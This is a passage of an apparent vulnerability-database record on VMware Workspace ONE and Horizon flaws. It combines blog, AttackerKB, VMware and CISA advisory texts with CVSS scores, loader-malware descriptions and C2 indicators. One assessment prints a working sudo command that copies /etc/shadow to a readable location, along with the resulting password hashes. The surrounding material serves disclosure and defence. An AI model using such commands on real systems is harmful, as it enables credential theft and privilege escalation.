warns](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/vmware-vulnerabilities-are-actively-being-exploited-cisa-warns/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-19T12:42:13", "type": "malwarebytes", "title": "VMWare vulnerabilities are actively being exploited, CISA warns", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22972", "CVE-2022-22973"], "modified": "2022-05-19T12:42:13", "id": "MALWAREBYTES:76A60CFA2FA67B3D288E8C0349CFEBF8", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/vmware-vulnerabilities-are-actively-being-exploited-cisa-warns/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-06-03T19:56:48", "description": "VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability due to improper permissions in support scripts. A malicious actor with local access can escalate privileges to \u2018root\u2019.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at May 23, 2022 1:41pm UTC reported:\n\nThere exists a vulnerability within `/usr/local/horizon/scripts/publishCaCert.hzn` where a local attacker can invoke the script to make any file world-readable. The script is intended to facilitate certificate management, allowing cert files to be copied into `/etc/ssl/certs` which is owned by root. The script can be invoked by the `horizon` user without a sudo password.\n\nThe script takes two arguments, the first a path to the file to copy, the second the name of the file to write to the destination. The source path argument can be any file, but the destination is only the final component of the path meaning the file will be placed in `/etc/ssl/certs`.\n\nA local user running as `horizon` (such as from successfully exploiting [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954>)) can exploit this vulnerability to recover the shadow file by executing:\n \n \n horizon [ /tmp ]$ sudo /usr/local/horizon/scripts/publishCaCert.hzn /etc/shadow shadow; cat /etc/ssl/certs/shadow\n root:$6$Y49xfSabYZeOAAKr$VN0QQ5IsF1swmo7PmW7SMwFpdxo.RuN2W1FEc/gF814JhnC/KU.FEBMVxDx5aRclwcfp8OYjFqzqNxtb3hQPz.:19131:0:60:7:::\n bin:x:18964:0:60:7:::\n daemon:x:18964:0:60:7:::\n messagebus:x:18964:0:60:7:::\n systemd-bus-proxy:x:18964:0:60:7:::\n systemd-journal-gateway:x:18964:0:60:7:::\n systemd-journal-remote:x:18964:0:60:7:::\n systemd-journal-upload:x:18964:0:60:7:::\n systemd-network:x:18964:0:60:7:::\n systemd-resolve:x:18964:0:60:7:::\n systemd-timesync:x:18964:0:60:7:::\n nobody:x:18964:0:60:7:::\n sshd:!:18964:0:60:7:::\n rabbitmq:!:18964::60::::\n named:!:18964::60::::\n postgres:!:18964:0:60:7:::\n horizon:!:18964:0:60:7:::\n sshuser:$6$1ppozTLmRlrslppH$8XxgQXUSOc.zUBTOkXFdaNR4Cmd2rPhyioLIQ.fiyvdIlMXGvpOWprt8JTZ12NOP1My2xqJpqewfP/BYLqvul1:18964:0:60:7:::\n elasticsearch:!:18964::60::::\n \n\n# Detection\n\nThe file that is written to the `/etc/ssl/certs` directory will still be owned by root making the attacker unable to delete it. A crafty attacker would backup an existing certificate file or create a new one, leak the file of their choosing and then overwrite it again with a legitimate certificate to remove the evidence of their leaked file. Users should look for files out of place in this directory, and inspect timestamps and the certificate contents to identify potential exploitation attempts of this vulnerability.\n\n# Remediation\n\nVMWare patched this issue with hotfix [HW-154129](<https://kb.vmware.com/s/article/88099>). The patch for the affected script adds validation to ensure that the argument is a certificate file.\n\nDiff:\n \n \n < . /usr/local/horizon/scripts/hzn-bin.inc\n < openssl x509 -noout -in $CERTFILE 2>/dev/null\n < \n < if [ $? -ne 0 ]; then\n < echo \"ERROR: This is not a certificate file\"\n < exit 1\n < fi\n <\n \n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T00:00:00", "type": "attackerkb", "title": "CVE-2022-22960", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22960"], "modified": "2022-04-13T00:00:00", "id": "AKB:959B5BD6-9496-432C-AD1F-DB90CB01C12D", "href": "https://attackerkb.com/topics/E62D0oFo6u/cve-2022-22960", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-27T05:06:07", "description": "VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at May 02, 2022 10:32pm UTC reported:\n\nWith publicly available information, this was super trivial to exploit! In [the Rapid7 analysis](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis>), I chained it together with what I thought was [CVE-2022-22960](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22960>) (I\u2019m not sure it was anymore) to go from unauthenticated HTTPS access to root very easily.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-06T00:00:00", "type": "attackerkb", "title": "CVE-2022-22954", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22954", "CVE-2022-22960"], "modified": "2022-05-06T00:00:00", "id": "AKB:3191CCF9-DA8E-43DF-8152-1E3A5D1A3C45", "href": "https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-08T23:07:13", "description": "VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at May 26, 2022 9:39pm UTC reported:\n\n[CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis>) came out at nearly the same time, is easier to exploit, and grants access to the underlying OS rather than the web interface. I think that\u2019s going to be the issue that ends up mattering, and this will be overshadowed.\n\nThe biggest problem is that this requires an Internet-facing SSL server, so attacks can\u2019t easily be automated.\n\n**zeroSteiner** at May 26, 2022 6:14pm UTC reported:\n\n[CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis>) came out at nearly the same time, is easier to exploit, and grants access to the underlying OS rather than the web interface. I think that\u2019s going to be the issue that ends up mattering, and this will be overshadowed.\n\nThe biggest problem is that this requires an Internet-facing SSL server, so attacks can\u2019t easily be automated.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-26T00:00:00", "type": "attackerkb", "title": "CVE-2022-22972", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22972", "CVE-2022-22973"], "modified": "2022-05-26T00:00:00", "id": "AKB:2BBFFC82-B69B-4A49-9B90-A6E5C745141F", "href": "https://attackerkb.com/topics/Ur2L7rHv2F/cve-2022-22972", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2022-11-02T03:01:01", "description": "3a. Authentication Bypass Vulnerability (CVE-2022-31656) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. \n\n3b. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31658) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3c. SQL injection Remote Code Execution Vulnerability (CVE-2022-31659) \n\nVMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3d. Local Privilege Escalation Vulnerability (CVE-2022-31660, CVE-2022-31661) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain two privilege escalation vulnerabilities. VMware has evaluated the severity of these issues to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3e. Local Privilege Escalation Vulnerability (CVE-2022-31664) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3f. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31665) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.6. \n\n3g. URL Injection Vulnerability (CVE-2022-31657) \n\nVMware Workspace ONE Access and Identity Manager contain a URL injection vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.9. \n\n3h. Path traversal vulnerability (CVE-2022-31662) \n\nVMware Workspace ONE Access, Identity Manager, Connectors and vRealize Automation contain a path traversal vulnerability. VMware has evaluated the severity of this issues to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3. \n\n3i. Cross-site scripting (XSS) vulnerability (CVE-2022-31663) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a reflected cross-site scripting (XSS) vulnerability. VMware has evaluated the severity of this issues to be in the Moderate severity range with a maximum CVSSv3 base score of 4.7.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-02T00:00:00", "type": "vmware", "title": "VMware Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector and vRealize Automation updates address multiple vulnerabilities.", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31663", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-09T00:00:00", "id": "VMSA-2022-0021.1", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0021.1.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-12T17:12:24", "description": "3a. Authentication Bypass Vulnerability (CVE-2022-31656) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. \n\n3b. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31658) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3c. SQL injection Remote Code Execution Vulnerability (CVE-2022-31659) \n\nVMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3d. Local Privilege Escalation Vulnerability (CVE-2022-31660, CVE-2022-31661) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain two privilege escalation vulnerabilities. VMware has evaluated the severity of these issues to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3e. Local Privilege Escalation Vulnerability (CVE-2022-31664) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3f. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31665) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.6. \n\n3g. URL Injection Vulnerability (CVE-2022-31657) \n\nVMware Workspace ONE Access and Identity Manager contain a URL injection vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.9. \n\n3h. Path traversal vulnerability (CVE-2022-31662) \n\nVMware Workspace ONE Access, Identity Manager, Connectors and vRealize Automation contain a path traversal vulnerability. VMware has evaluated the severity of this issues to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3. \n\n3i. Cross-site scripting (XSS) vulnerability (CVE-2022-31663) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a reflected cross-site scripting (XSS) vulnerability. VMware has evaluated the severity of this issues to be in the Moderate severity range with a maximum CVSSv3 base score of 4.7.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-02T00:00:00", "type": "vmware", "title": "VMware Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector and vRealize Automation updates address multiple vulnerabilities.", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31663", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-02T00:00:00", "id": "VMSA-2022-0021", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0021.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-19T20:02:02", "description": "3a. Server-side Template Injection Remote Code Execution Vulnerability (CVE-2022-22954) \n\nVMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. \n\n3b. OAuth2 ACS Authentication Bypass Vulnerabilities (CVE-2022-22955, CVE-2022-22956) \n\nVMware Workspace ONE Access has two authentication bypass vulnerabilities in the OAuth2 ACS framework. VMware has evaluated the severity of these issues to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. \n\n3c. JDBC Injection Remote Code Execution Vulnerabilities (CVE-2022-22957, CVE-2022-22958) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain two remote code execution vulnerabilities. VMware has evaluated the severity of these issues to be in the Critical severity range with a maximum CVSSv3 base score of 9.1. \n\n3d. Cross Site Request Forgery Vulnerability (CVE-2022-22959) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a cross site request forgery vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.8. \n\n3e. Local Privilege Escalation Vulnerability (CVE-2022-22960) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability due to improper permissions in support scripts. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3f. Information Disclosure Vulnerability (CVE-2022-22961) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an information disclosure vulnerability due to returning excess information. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-06T00:00:00", "type": "vmware", "title": "VMware Workspace ONE Access, Identity Manager and vRealize Automation updates address multiple vulnerabilities.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22955", "CVE-2022-22956", "CVE-2022-22957", "CVE-2022-22958", "CVE-2022-22959", "CVE-2022-22960", "CVE-2022-22961"], "modified": "2022-04-13T00:00:00", "id": "VMSA-2022-0011", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0011.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-03-14T18:26:26", "description": "### Summary\n\nActions to take today: \n\u2022 Install fixed builds, updating all affected VMware Horizon and UAG systems to the latest versions. If updates or workarounds were not promptly applied following VMware\u2019s [release of updates for Log4Shell](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) in December 2021,** treat all affected VMware systems as compromised.** \n\u2022 Minimize the internet-facing attack surface by hosting essential services on a segregated demilitarized (DMZ) zone, ensuring strict network perimeter access controls, and implementing regularly updated web application firewalls (WAFs) in front of public-facing services\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard Cyber Command (CGCYBER) are releasing this joint Cybersecurity Advisory (CSA) to warn network defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon\u00ae and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches or workarounds.\n\nSince December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and UAG servers. As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2). In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data.\n\nThis CSA provides the suspected APT actors\u2019 tactics, techniques, and procedures (TTPs), information on the loader malware, and indicators of compromise (IOCs). The information is derived from two related incident response engagements and malware analysis of samples discovered on the victims\u2019 networks.\n\nCISA and CGCYBER recommend all organizations with affected systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities using the IOCs provided in this CSA, Malware Analysis Report [MAR-10382580-1](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-174b>), and [MAR-10382254-1](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-174a>). If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to CISA.\n\n**_Update July 18, 2022:_**\n\nThis Cybersecurity Advisory (CSA) has been updated with additional Malware Analysis Report [MAR-10382580-2](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-197a >), which provides additional indicators of compromise (IOCs). \n\n**_Update End_**\n\nSee the list below to download copies of IOCs: \n\n * AA22-174A stix\n * MAR-10382254-1 stix\n * MAR-10382580-1 stix\n * _**Update July 18, 2022:**_ [MAR-10382580-2 stix](<https://www.cisa.gov/uscert/sites/default/files/MAR-10382580.r2.v1.WHITE_stix.xml>)\n\nDownload the pdf version of this report: [pdf, 426 kb]\n\n### Technical Details\n\n**Note: **this advisory uses the [MITRE ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v11/matrices/enterprise/>) framework, version 11. See Appendix A for a table of the threat actors\u2019 activity mapped to MITRE ATT&amp;CK\u00ae tactics and techniques.\n\nLog4Shell is a remote code execution vulnerability affecting the Apache\u00ae Log4j library and a variety of products using Log4j, such as consumer and enterprise services, websites, applications, and other products, including certain versions of VMware Horizon and UAG. The vulnerability enables malicious cyber actors to submit a specially crafted request to a vulnerable system, causing the system to execute arbitrary code. The request allows the malicious actors to take full control of the affected system. (For more information on Log4Shell, see CISA\u2019s [Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) webpage and VMware advisory [VMSA-2021-0028.13](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>).) \n\nVMware made fixes available in December 2021 and confirmed exploitation in the wild on December 10, 2021.[[1](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>)] Since December 2021, multiple cyber threat actor groups have exploited [[T1190](<https://attack.mitre.org/versions/v11/techniques/T1190/>)] Log4Shell on unpatched, public-facing VMware Horizon and UAG servers to obtain initial access [[TA0001](<https://attack.mitre.org/versions/v11/tactics/TA0001/>)] to networks. \n\nAfter obtaining access, some actors implanted loader malware on compromised systems with embedded executables enabling remote C2. These actors connected to known malicious IP address `104.223.34[.]198`.[2] This IP address uses a self-signed certificate CN: `WIN-P9NRMH5G6M8. `In at least one confirmed compromise, the actors collected and exfiltrated sensitive information from the victim\u2019s network. \n\nThe sections below provide information CISA and CGCYBER obtained during incident response activities at two related confirmed compromises.\n\n#### Victim 1\n\nCGCYBER conducted a proactive threat-hunting engagement at an organization (Victim 1) compromised by actors exploiting Log4Shell in VMware Horizon. After obtaining access, threat actors uploaded malware, `hmsvc.exe`, to a compromised system. During malware installation, connections to IP address `104.223.34[.]198` were observed. \n\nCISA and CGCYBER analyzed a sample of `hmsvc.exe` from the confirmed compromise. hmsvc.exe masquerades as a legitimate Microsoft\u00ae Windows\u00ae service (SysInternals LogonSessions software) [[T1036.004](<https://attack.mitre.org/versions/v11/techniques/T1036/004/>)] and appears to be a modified version of SysInternals LogonSessions software embedded with malicious packed code. When discovered, the analyzed sample of hmsvc.exe was running as `NT AUTHORITY\\SYSTEM`, the highest privilege level on a Windows system. It is unknown how the actors elevated privileges. \n\n`hmsvc.exe` is a Windows loader containing an embedded executable, `658_dump_64.exe`. The embedded executable is a remote access tool that provides an array of C2 capabilities, including the ability to log keystrokes [[T1056.001](<https://attack.mitre.org/versions/v11/techniques/T1056/001/>)], upload and execute additional payloads [[T1105](<https://attack.mitre.org/versions/v11/techniques/T1105/>)], and provide graphical user interface (GUI) access over a target Windows system's desktop. The malware can function as a C2 tunneling proxy [[T1090](<https://attack.mitre.org/versions/v11/techniques/T1090/>)], allowing a remote operator to pivot to other systems and move further into a network.\n\nWhen first executed, `hmsvc.exe` creates the Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v11/techniques/T1053/005/>)], `C:\\Windows\\System32\\Tasks\\Local Session Updater`, which executes malware every hour. When executed, two randomly named `*.tmp` files are written to the disk at the location `C:\\Users\\<USER>\\AppData\\Local\\Temp\\` and the embedded executable attempts to connect to hard-coded C2 server `192.95.20[.]8` over port `4443`, a non-standard port [[TT571](<https://attack.mitre.org/versions/v11/techniques/T1571/>)]. The executable\u2019s inbound and outbound communications are encrypted with a 128-bit key [[T1573.001](<https://attack.mitre.org/versions/v11/techniques/T1573/001/>)].\n\nFor more information on hmsvc.exe, including IOCs and detection signatures, see [MAR-10382254-1](<https://cisa.gov/uscert/ncas/analysis-reports/ar22-174a>).\n\n#### Victim 2\n\nFrom late April through May 2022, CISA conducted an onsite incident response engagement at an organization (Victim 2) where CISA observed bi-directional traffic between the organization and suspected APT IP address `104.223.34[.]198`. During incident response, CISA determined Victim 2 was compromised by multiple threat actor groups. \n\nThe threat actors using IP `104.223.34[.]198` gained initial access to Victim 2\u2019s production environment in late January 2022, or earlier. These actors likely obtained access by exploiting Log4Shell in an unpatched VMware Horizon server. On or around January 30, likely shortly after the threat actors gained access, CISA observed the actors using PowerShell scripts [[T1059.001](<https://attack.mitre.org/versions/v11/techniques/T1059/001/>)] to callout to `109.248.150[.]13` via Hypertext Transfer Protocol (HTTP) [[T1071.001](<https://attack.mitre.org/versions/v11/techniques/T1071/001/>)] to retrieve additional PowerShell scripts. Around the same period, CISA observed the actors attempt to download [[T1105](<https://attack.mitre.org/versions/v11/techniques/T1105/>)] and execute a malicious file from `109.248.150[.]13`. The activity started from IP address `104.155.149[.]103`, which appears to be part of the actors\u2019 C2 [[TA0011](<https://attack.mitre.org/versions/v11/tactics/TA0011/>)] infrastructure. \n\nAfter gaining initial access to the VMware Horizon server, the threat actors moved laterally [[TA0008](<https://attack.mitre.org/versions/v11/tactics/TA0008/>)] via Remote Desktop Protocol (RDP) [[T1021.001](<https://attack.mitre.org/versions/v11/techniques/T1021/001/>)] to multiple other hosts in the production environment, including a security management server, a certificate server, a database containing sensitive law enforcement data, and a mail relay server. The threat actors also moved laterally via RDP to the organization\u2019s disaster recovery network. The threat actors gained credentials [[TA0006](<https://attack.mitre.org/versions/v11/tactics/TA0006/>)] for multiple accounts, including administrator accounts. It is unknown how these credentials were acquired. \n\nAfter moving laterally to other production environment hosts and servers, the actors implanted loader malware on compromised servers containing executables enabling remote C2. The threat actors used compromised administrator accounts to run the loader malware. The loader malware appears to be modified versions of SysInternals LogonSessions, Du, or PsPing software. The embedded executables belong to the same malware family, are similar in design and functionality to `658_dump_64.exe`, and provide C2 capabilities to a remote operator. These C2 capabilities include the ability to remotely monitor a system's desktop, gain reverse shell access, exfiltrate data, and upload and execute additional payloads. The embedded executables can also function as a proxy. \n\nCISA found the following loader malware:\n\n * `SvcEdge.exe` is a malicious Windows loader containing encrypted executable `f7_dump_64.exe`. When executed, `SvcEdge.exe` decrypts and loads `f7_dump_64.exe` into memory. During runtime, `f7_dump_64.exe` connects to hard-coded C2 server `134.119.177[.]107` over port `443`. \n * `odbccads.exe` is a malicious Windows loader containing an encrypted executable. When executed, `odbccads.exe` decrypts and loads the executable into 